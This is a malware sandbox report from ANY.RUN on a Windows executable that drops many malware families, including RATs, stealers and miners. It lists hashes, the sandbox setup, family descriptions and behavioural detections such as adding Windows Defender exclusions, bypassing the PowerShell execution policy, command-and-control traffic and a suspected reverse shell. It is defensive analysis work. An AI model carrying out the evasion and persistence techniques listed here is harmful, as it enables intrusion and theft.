Malware analysis main.exe Malicious activity | ANY.RUN

Add for printing

File name:	main.exe
Full analysis:	https://app.any.run/tasks/1254843f-b017-4063-9462-e38ff63b180f
Verdict:	Malicious activity
Threats:	Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. Gh0st RAT is a malware with advanced trojan functionality that enables attackers to establish full control over the victim’s system. The spying capabilities of Gh0st RAT made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common vector of attack involving this malware begins with spam and phishing emails. Havoc is an advanced post-exploitation framework used by hackers to take control of a system once they've breached it. With Havoc, attackers can run commands remotely, inject malicious processes, and access sensitive data. It's often used in targeted attacks, allowing cybercriminals to stay hidden in a network while stealing information or launching further attacks. Its flexibility and ability to bypass detection make it a serious threat, especially in environments that rely on traditional security tools. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world. njRAT ist ein Trojaner für den Fernzugriff. Es handelt sich um einen der am weitesten verbreiteten RATs auf dem Markt, der eine Fülle von Bildungsinformationen bietet. Interessierte Angreifer können sogar Tutorials auf YouTube finden. Dies macht ihn zu einem der beliebtesten RATs der Welt. First identified in March 2021, PureCrypter is a .NET-based loader that employs obfuscation techniques, such as SmartAssembly, to evade detection. It has been used to distribute malware families including AgentTesla, RedLine Stealer, and SnakeKeylogger. The malware is typically delivered through phishing campaigns and malicious downloads, often masquerading as legitimate files with extensions like .mp4 or .pdf. PureCrypter utilizes encryption and compression to conceal its payloads and can inject malicious code into legitimate processes to maintain persistence on the infected system. PureLogs is a stealer that collects a wide range of data from infected systems, including browser data, crypto wallets, PC configuration details, etc. It is delivered by PureCrypter, another malware that belongs to the Pure malware family. PureLogs is distributed based on a subscription model, allowing any threat actor to utilize it in their attacks. Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. RedLine Stealer is a malicious program that collects users’ confidential data from browsers, systems, and installed software. It also infects operating systems with other malware. Remcos is a commercially distributed remote administration and surveillance tool that has been widely observed in unauthorized deployments, where threat actors use it to perform remote actions on compromised machines. It is actively maintained by its vendor, with new versions and feature updates released on a frequent, near-monthly basis. Remcos ist eine Malware vom Typ RAT, mit der Angreifer aus der Ferne Aktionen auf infizierten Computern durchführen können. Diese Malware ist extrem aktiv und wird fast jeden Monat mit Updates auf den neuesten Stand gebracht. Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes. Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests. Stealc ist eine Stealer-Malware, die es auf die sensiblen Daten der Opfer abgesehen hat, die sie aus Browsern, Messaging-Apps und anderer Software exfiltriert. Die Malware ist mit fortschrittlichen Funktionen ausgestattet, darunter Fingerprinting, Bedienfeld, Umgehungsmechanismen, String-Verschleierung usw. Stealc stellt eine Persistenz her und kommuniziert mit seinem C2-Server über HTTP-POST-Anfragen. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. XWorm ist ein Remote Access Trojaner (RAT), der als Malware-as-a-Service verkauft wird. Er verfügt über ein umfangreiches Hacking-Toolset und ist in der Lage, private Informationen und Dateien auf dem infizierten Computer zu sammeln, MetaMask- und Telegram-Konten zu kapern und Benutzeraktivitäten zu verfolgen. XWorm wird in der Regel durch mehrstufige Angriffe auf die Computer der Opfer übertragen, die mit Phishing-E-Mails beginnen. Malware Trends Tracker >>>
Analysis date:	July 04, 2025, 15:44:50
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	loader python github phishing clickfix possible-phishing meterpreter backdoor payload metasploit miner stealc stealer remcos rat amadey botnet scan auto generic coinminer asyncrat formbook azorult nanocore gh0st remote njrat bruteratel rhadamanthys purelogs purecrypter bladabindi quasarrat discord quasar pyinstaller delphi bazaloader stealerium redline anydesk rmm-tool xworm stormkitty whitesnakestealer babadeda havoc evasion dcrat pythonstealer
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:	C942A56638772644D847709D906FA23D
SHA1:	12D6B77FEC2244CDC4050A083AA741185CC48010
SHA256:	56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A
SSDEEP:	98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: on
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Uses Task Scheduler to autorun other applications
  - cmd.exe (PID: 2072)
  - Java32.exe (PID: 18404)
  - quasarat.exe (PID: 16264)
- PHISHING has been detected (SURICATA)
  - svchost.exe (PID: 2200)
- CLICKFIX has been detected (SURICATA)
  - svchost.exe (PID: 2200)
  - main.exe (PID: 2780)
- GENERIC has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 10008)
  - powershell.exe (PID: 10208)
  - powershell.exe (PID: 10268)
  - powershell.exe (PID: 10344)
  - powershell.exe (PID: 11548)
  - powershell.exe (PID: 13036)
  - powershell.exe (PID: 13928)
  - powershell.exe (PID: 13460)
  - powershell.exe (PID: 13516)
  - powershell.exe (PID: 11752)
  - powershell.exe (PID: 14340)
  - powershell.exe (PID: 14432)
  - powershell.exe (PID: 14768)
  - powershell.exe (PID: 16104)
  - powershell.exe (PID: 16356)
  - powershell.exe (PID: 16348)
  - powershell.exe (PID: 14224)
  - powershell.exe (PID: 15092)
  - powershell.exe (PID: 18232)
  - powershell.exe (PID: 2704)
  - powershell.exe (PID: 16736)
- Changes powershell execution policy (Bypass)
  - main.exe (PID: 2780)
  - powershell.exe (PID: 11548)
- COINMINER has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
- ASYNCRAT has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - imagelogger.exe (PID: 13524)
- GH0ST has been found (auto)
  - main.exe (PID: 2780)
- METERPRETER has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
- METERPRETER has been detected (SURICATA)
  - main.exe (PID: 2780)
- METASPLOIT has been detected (SURICATA)
  - main.exe (PID: 2780)
- STEALC mutex has been found
  - vtoroy.exe (PID: 13012)
  - perviy.exe (PID: 13944)
  - tretiy.exe (PID: 14472)
- STEALC has been detected
  - vtoroy.exe (PID: 13012)
  - perviy.exe (PID: 13944)
  - tretiy.exe (PID: 14472)
- REMCOS mutex has been found
  - evetbeta.exe (PID: 12092)
  - prueba.exe (PID: 16280)
  - NOTallowedtocrypt.exe (PID: 20028)
- REMCOS has been detected
  - evetbeta.exe (PID: 12092)
  - prueba.exe (PID: 16280)
- Application was injected by another process
  - explorer.exe (PID: 4772)
- Runs injected code in another process
  - JcQiZ5o.exe (PID: 7608)
- METASPLOIT has been found (auto)
  - main.exe (PID: 2780)
- Changes the autorun value in the registry
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - webhook.exe (PID: 16332)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Axam.a.exe (PID: 13948)
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - NOTallowedtocrypt.exe (PID: 20028)
  - server.exe (PID: 17200)
  - SteamDetector.exe (PID: 19372)
  - Axam.exe (PID: 19248)
  - Axam.exe (PID: 20064)
  - server.exe (PID: 1324)
  - Axam.exe (PID: 20072)
  - quasarat.exe (PID: 16264)
  - Axam.exe (PID: 20016)
- AMADEY mutex has been found
  - random.exe (PID: 13888)
  - suker.exe (PID: 15496)
- NANOCORE has been found (auto)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - main.exe (PID: 2780)
- Create files in the Startup directory
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Axam.a.exe (PID: 13948)
  - conhost.exe (PID: 17760)
  - imagelogger.exe (PID: 13524)
  - SteamDetector.exe (PID: 19372)
  - server.exe (PID: 1324)
- RHADAMANTHYS has been found (auto)
  - main.exe (PID: 2780)
- AMADEY has been detected (SURICATA)
  - nudwee.exe (PID: 10284)
  - suker.exe (PID: 15496)
- NJRAT has been found (auto)
  - main.exe (PID: 2780)
  - njrat.exe (PID: 14464)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Server.exe (PID: 14616)
  - rundll32.exe (PID: 14668)
  - server.exe (PID: 1324)
- QUASAR has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
- REMCOS has been detected (SURICATA)
  - evetbeta.exe (PID: 12092)
  - Host.exe (PID: 15104)
- Connects to the CnC server
  - evetbeta.exe (PID: 12092)
  - nudwee.exe (PID: 10284)
  - main.exe (PID: 2780)
  - 1UCzP6D.exe (PID: 12612)
  - suker.exe (PID: 15496)
  - Server1.exe (PID: 13864)
- AZORULT mutex has been detected
  - onetap.exe (PID: 14952)
- Attempting to scan the network
  - award.pdf.exe (PID: 4884)
- ASYNCRAT has been detected (MUTEX)
  - AsyncClient.exe (PID: 10548)
  - ddosziller.exe (PID: 10528)
  - Krishna33.exe (PID: 14424)
  - aaa%20(3).exe (PID: 16312)
  - freffercerere.exe (PID: 17732)
  - aaa%20(3).exe (PID: 13356)
- BAZALOADER has been found (auto)
  - main.exe (PID: 2780)
- Executing a file with an untrusted certificate
  - witheFile.exe (PID: 16552)
- NJRAT mutex has been found
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Fast%20Download.exe (PID: 13904)
  - Bloxflip%20Predictor.exe (PID: 14124)
  - Bloxflip Predictor.exe (PID: 17688)
- STEALER has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
- PURELOGS has been detected (SURICATA)
  - 1UCzP6D.exe (PID: 12612)
- Run PowerShell with an invisible window
  - powershell.exe (PID: 17968)
  - powershell.exe (PID: 2704)
  - powershell.exe (PID: 20180)
- PURELOGS has been found (auto)
  - main.exe (PID: 2780)
- RAT has been found (auto)
  - SteamDetector.exe (PID: 16240)
  - SteamDetector.exe (PID: 19372)
- QUASARRAT has been found (auto)
  - main.exe (PID: 2780)
  - Java32.exe (PID: 18404)
- Changes Windows Defender settings
  - Vikings.exe (PID: 13492)
- Adds path to the Windows Defender exclusion list
  - Vikings.exe (PID: 13492)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - svchost.exe (PID: 13912)
  - XClient.exe (PID: 11788)
- HAVOC has been found (auto)
  - main.exe (PID: 2780)
- DCRAT has been found (auto)
  - main.exe (PID: 2780)
  - main.exe (PID: 2780)
- NjRAT is detected
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - server.exe (PID: 17200)
  - SteamDetector.exe (PID: 19372)
  - server.exe (PID: 1324)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 10208)
- XWORM has been detected (SURICATA)
  - System32.exe (PID: 12520)
  - RegAsm.exe (PID: 9044)
- NJRAT has been detected (SURICATA)
  - Server1.exe (PID: 13864)
- FORMBOOK has been found (auto)
  - main.exe (PID: 2780)
- PYTHONSTEALER has been found (auto)
  - main.exe (PID: 2780)
- REMCOS has been found (auto)
  - main.exe (PID: 2780)
- Uses AES cipher (POWERSHELL)
  - powershell.exe (PID: 13036)
- QUASAR mutex has been found
  - quasarat.exe (PID: 16264)
- Request from PowerShell which ran from CMD.EXE
  - powershell.exe (PID: 10080)
SUSPICIOUS
- Executable content was dropped or overwritten
  - main.exe (PID: 3924)
  - main.exe (PID: 2780)
  - QpKuKKY.exe (PID: 9300)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - random.exe (PID: 13888)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - 444.exe (PID: 14108)
  - Server.exe (PID: 14616)
  - njrat.exe (PID: 14464)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - SteamDetector.exe (PID: 16240)
  - Axam.a.exe (PID: 13948)
  - conhost.exe (PID: 17760)
  - new.exe (PID: 4192)
  - suker.exe (PID: 15496)
  - rundll32.exe (PID: 14668)
  - Java32.exe (PID: 18404)
  - imagelogger.exe (PID: 13524)
  - NOTallowedtocrypt.exe (PID: 20028)
  - SteamDetector.exe (PID: 19372)
  - powershell.exe (PID: 13036)
  - server.exe (PID: 1324)
- Process drops python dynamic module
  - main.exe (PID: 3924)
- The process drops C-runtime libraries
  - main.exe (PID: 3924)
- Process drops legitimate windows executable
  - main.exe (PID: 3924)
  - main.exe (PID: 2780)
- Application launched itself
  - main.exe (PID: 3924)
  - cmd.exe (PID: 10256)
  - powershell.exe (PID: 11548)
- Loads Python modules
  - main.exe (PID: 2780)
- Starts CMD.EXE for commands execution
  - main.exe (PID: 2780)
  - av_downloader.exe (PID: 13936)
  - av_downloader1.1.exe (PID: 13968)
  - pclient.exe (PID: 5184)
  - webhook.exe (PID: 16332)
  - pornhub_downloader.exe (PID: 14644)
  - pornhub_downloader.exe (PID: 14972)
  - pornhub_downloader.exe (PID: 14936)
  - cmd.exe (PID: 10256)
  - NOTallowedtocrypt.exe (PID: 20028)
- The process checks if it is being run in the virtual environment
  - main.exe (PID: 2780)
  - OpenWith.exe (PID: 15140)
- Process requests binary or script from the Internet
  - main.exe (PID: 2780)
  - suker.exe (PID: 15496)
  - powershell.exe (PID: 10080)
- Connects to unusual port
  - main.exe (PID: 2780)
  - tmp.exe (PID: 10620)
  - sup.exe (PID: 12668)
  - elf.exe (PID: 11044)
  - sys.exe (PID: 11768)
  - Worldofficee.exe (PID: 14928)
  - Worldoffice.exe (PID: 14360)
  - evetbeta.exe (PID: 12092)
  - connector1.exe (PID: 15428)
  - Host.exe (PID: 15104)
  - RegAsm.exe (PID: 9044)
  - 1223.exe (PID: 15404)
  - System32.exe (PID: 12520)
  - 1UCzP6D.exe (PID: 12612)
  - https.exe (PID: 16288)
  - Server1.exe (PID: 13864)
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - freffercerere.exe (PID: 17732)
  - powershell.exe (PID: 13460)
  - powershell.exe (PID: 10344)
  - imagelogger.exe (PID: 13524)
- Block-list domains
  - main.exe (PID: 2780)
- Executing commands from a ".bat" file
  - main.exe (PID: 2780)
  - av_downloader.exe (PID: 13936)
  - av_downloader1.1.exe (PID: 13968)
  - webhook.exe (PID: 16332)
  - pornhub_downloader.exe (PID: 14936)
  - pornhub_downloader.exe (PID: 14972)
  - pornhub_downloader.exe (PID: 14644)
  - cmd.exe (PID: 10256)
- Starts POWERSHELL.EXE for commands execution
  - main.exe (PID: 2780)
  - cmd.exe (PID: 9884)
  - cmd.exe (PID: 13468)
  - Vikings.exe (PID: 13492)
  - powershell.exe (PID: 11548)
  - cmd.exe (PID: 14400)
  - cmd.exe (PID: 12296)
  - cmd.exe (PID: 16224)
  - cmd.exe (PID: 14628)
- The process executes Powershell scripts
  - main.exe (PID: 2780)
  - cmd.exe (PID: 9884)
  - cmd.exe (PID: 14400)
- Connects to the server without a host name
  - main.exe (PID: 2780)
  - nudwee.exe (PID: 10284)
  - suker.exe (PID: 15496)
  - powershell.exe (PID: 10208)
  - powershell.exe (PID: 10080)
- Found IP address in command line
  - powershell.exe (PID: 10080)
  - powershell.exe (PID: 17968)
  - powershell.exe (PID: 2704)
  - powershell.exe (PID: 19280)
- Downloads file from URI via Powershell
  - powershell.exe (PID: 10080)
  - powershell.exe (PID: 19280)
  - powershell.exe (PID: 20180)
- Reads security settings of Internet Explorer
  - QpKuKKY.exe (PID: 9300)
  - nudwee.exe (PID: 10284)
  - av_downloader1.1.exe (PID: 13968)
  - random.exe (PID: 13888)
  - pornhub_downloader.exe (PID: 14644)
  - pornhub_downloader.exe (PID: 14936)
  - onetap.exe (PID: 14952)
  - pornhub_downloader.exe (PID: 14972)
  - nfe.sfx.exe (PID: 16340)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - suker.exe (PID: 15496)
  - Host.exe (PID: 15104)
  - PCclear_Eng_mini.exe (PID: 14516)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - 444.exe (PID: 14108)
  - njrat.exe (PID: 14464)
  - Server.exe (PID: 14616)
  - nfe.sfx.exe (PID: 6004)
  - SteamDetector.exe (PID: 16240)
  - new.exe (PID: 4192)
  - svchost.exe (PID: 13912)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
  - justpoc.exe (PID: 20340)
  - NOTallowedtocrypt.exe (PID: 20028)
- Starts itself from another location
  - QpKuKKY.exe (PID: 9300)
  - random.exe (PID: 13888)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - 444.exe (PID: 14108)
  - Server.exe (PID: 14616)
  - njrat.exe (PID: 14464)
  - SteamDetector.exe (PID: 16240)
- Potential Corporate Privacy Violation
  - main.exe (PID: 2780)
  - award.pdf.exe (PID: 4884)
  - suker.exe (PID: 15496)
- The process creates files with name similar to system file names
  - main.exe (PID: 2780)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - 444.exe (PID: 14108)
  - njrat.exe (PID: 14464)
  - rundll32.exe (PID: 14668)
  - SteamDetector.exe (PID: 19372)
- Crypto Currency Mining Activity Detected
  - main.exe (PID: 2780)
- Windows Defender mutex has been found
  - vtoroy.exe (PID: 13012)
  - perviy.exe (PID: 13944)
  - tretiy.exe (PID: 14472)
- Executing commands from ".cmd" file
  - main.exe (PID: 2780)
- Contacting a server suspected of hosting an CnC
  - nudwee.exe (PID: 10284)
  - evetbeta.exe (PID: 12092)
  - Host.exe (PID: 15104)
  - main.exe (PID: 2780)
  - suker.exe (PID: 15496)
  - System32.exe (PID: 12520)
  - Server1.exe (PID: 13864)
  - RegAsm.exe (PID: 9044)
- Uses NETSH.EXE to add a firewall rule or allowed programs
  - Server1.exe (PID: 13864)
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - server.exe (PID: 17200)
  - SteamDetector.exe (PID: 19372)
  - SearchUII.exe (PID: 14316)
  - server.exe (PID: 1324)
- Starts a Microsoft application from unusual location
  - webhook.exe (PID: 16332)
  - freffercerere.exe (PID: 17732)
- Creates file in the systems drive root
  - explorer.exe (PID: 4772)
  - Axam.a.exe (PID: 13948)
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - SteamDetector.exe (PID: 19372)
  - Axam.exe (PID: 19248)
  - Axam.exe (PID: 20064)
  - Axam.exe (PID: 20072)
  - Axam.exe (PID: 20016)
- Reads Microsoft Outlook installation path
  - nfe.sfx.exe (PID: 16340)
  - nfe.sfx.exe (PID: 6004)
- Reads Internet Explorer settings
  - nfe.sfx.exe (PID: 16340)
  - nfe.sfx.exe (PID: 6004)
- Uses ATTRIB.EXE to modify file attributes
  - Bloxflip%20Predictor.exe (PID: 14232)
- Probably download files using WebClient
  - cmd.exe (PID: 13468)
- Script adds exclusion path to Windows Defender
  - Vikings.exe (PID: 13492)
- Executes application which crashes
  - Te.exe (PID: 17012)
- ANYDESK has been found
  - main.exe (PID: 2780)
- Executes script without checking the security policy
  - powershell.exe (PID: 2704)
- The process hide an interactive prompt from the user
  - powershell.exe (PID: 11548)
- Possibly malicious use of IEX has been detected
  - powershell.exe (PID: 11548)
- Potential TCP-based PowerShell reverse shell connection
  - powershell.exe (PID: 11548)
- The process bypasses the loading of PowerShell profile settings
  - powershell.exe (PID: 11548)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 13036)
- Starts NET.EXE to display or manage information about active sessions
  - cmd.exe (PID: 16156)
  - net.exe (PID: 19440)
- Checks for external IP
  - svchost.exe (PID: 2200)
  - imagelogger.exe (PID: 13524)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
  - quasarat.exe (PID: 16264)
- Write to the desktop.ini file (may be used to cloak folders)
  - SWID_reader.exe (PID: 19132)
- Reads the date of Windows installation
  - new.exe (PID: 4192)
  - svchost.exe (PID: 13912)
  - XClient.exe (PID: 11788)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
- Uses NETSH.EXE to change the status of the firewall
  - powershell.exe (PID: 10008)
- Starts process via Powershell
  - powershell.exe (PID: 20180)
- Gets path to any of the special folders (POWERSHELL)
  - powershell.exe (PID: 14768)
- Creates new GUID (POWERSHELL)
  - powershell.exe (PID: 14768)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 13036)
- CSC.EXE is used to compile C# code
  - csc.exe (PID: 14520)
INFO
- Checks supported languages
  - main.exe (PID: 3924)
  - main.exe (PID: 2780)
  - JcQiZ5o.exe (PID: 7608)
  - RegAsm.exe (PID: 9044)
  - VZXCHH66.exe (PID: 8000)
  - QpKuKKY.exe (PID: 9300)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - ddosziller.exe (PID: 10528)
  - AsyncClient.exe (PID: 10548)
  - elf.exe (PID: 11044)
  - shell.exe (PID: 11256)
  - nudwee.exe (PID: 10284)
  - XClient.exe (PID: 11788)
  - sys.exe (PID: 11768)
  - DumpAADUserPRT.exe (PID: 9340)
  - TEST.exe (PID: 12632)
  - VOLATUS0.5.exe (PID: 12648)
  - sup.exe (PID: 12668)
  - vtoroy.exe (PID: 13012)
  - uac_bypass.exe (PID: 12892)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - evetbeta.exe (PID: 12092)
  - 1UCzP6D.exe (PID: 12612)
  - System32.exe (PID: 12520)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - kg.exe (PID: 11732)
  - imagelogger.exe (PID: 13524)
  - mimilove.exe (PID: 11536)
  - svchost.exe (PID: 13912)
  - pclient.exe (PID: 5184)
  - Doppelganger.exe (PID: 11964)
  - kdmapper_Release.exe (PID: 13476)
  - World%20of%20Tanks.exe (PID: 13484)
  - keygen.exe (PID: 13508)
  - random.exe (PID: 13888)
  - script.exe (PID: 13896)
  - Fast%20Download.exe (PID: 13904)
  - 444.exe (PID: 14108)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - perviy.exe (PID: 13944)
  - SearchUII.exe (PID: 14316)
  - Vikings.exe (PID: 13492)
  - 444.exe (PID: 14100)
  - Bloxflip%20Predictor.exe (PID: 14124)
  - award.pdf.exe (PID: 4884)
